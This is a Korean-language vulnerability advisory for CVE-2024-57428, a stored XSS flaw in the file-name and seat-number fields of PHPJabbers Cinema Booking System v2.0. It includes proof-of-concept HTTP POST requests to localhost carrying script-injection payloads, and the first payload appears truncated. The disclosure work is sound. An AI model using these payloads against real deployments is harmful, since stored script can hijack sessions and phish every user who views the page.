
CVE-2024-57428: PHPJabbers Cinema Booking System v2.0은 저장형 XSS 취약점에 영향을 받으며, 이로 인해 피싱 및 악성코드 공격을 위한 지속적인 JavaScript 주입이 가능합니다.
PHPJabbers Cinema Booking System v2.0에는 파일 업로드 필드(event_img, seat_maps)와 좌석 번호 구성(pjActionCreate의 number[new_X])의 검증되지 않은 입력으로 인한 저장형 XSS(교차 사이트 스크립팅) 취약점이 존재합니다. 공격자는 지속적인 JavaScript를 주입하여 피싱, 악성코드 주입, 세션 하이재킹을 유발할 수 있습니다.
취약 매개변수: event_img 및 seat_maps's file name
저장형 XSS는 주입된 콘텐츠에 접근하는 모든 사용자에게 영향을 미치므로 반사형 XSS보다 더 심각합니다. 이는 지속적인 피싱 공격, 세션 탈취 또는 대규모 사용자 기반에 대한 악성코드 주입에 악용될 수 있습니다.
페이로드: \">
POST /CinemaBookingDev/index.php?controller=pjAdminEvents&action=pjActionCreate HTTP/1.1
Host: 127.0.0.1
Content-Length: 38611
[SNIP]
------WebKitFormBoundaryKOsvqJhAGpZAt33t
Content-Disposition: form-data; name="event_img"; filename="luffy.jpg\">"
Content-Type: image/jpeg
페이로드: "><script>alert(x)</script>
POST /CinemaBookingDev/index.php?controller=pjAdminVenues&action=pjActionCreate HTTP/1.1
Host: 127.0.0.1
Content-Length: 1812
[SNIP]
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="seats_count"
11
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="number[new_1]"
1"><script>alert(1)</script>1
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="number[new_2]"
2"><script>alert(2)</script>2